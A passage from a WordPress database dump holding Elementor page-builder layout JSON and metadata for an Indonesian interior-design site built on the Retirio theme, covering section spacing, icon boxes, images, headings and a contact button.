\\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8611b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4564,4976,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4565,4976,'_elementor_pro_version','3.8.1'),(4566,4976,'_elementor_css','a:6:{s:4:\"time\";i:1695638544;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4567,4977,'_wp_page_template','elementor_header_footer'),(4568,4977,'_elementor_edit_mode','builder'),(4569,4977,'_elementor_template_type','wp-page'),(4570,4977,'_elementor_version','3.8.1'),(4571,4977,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":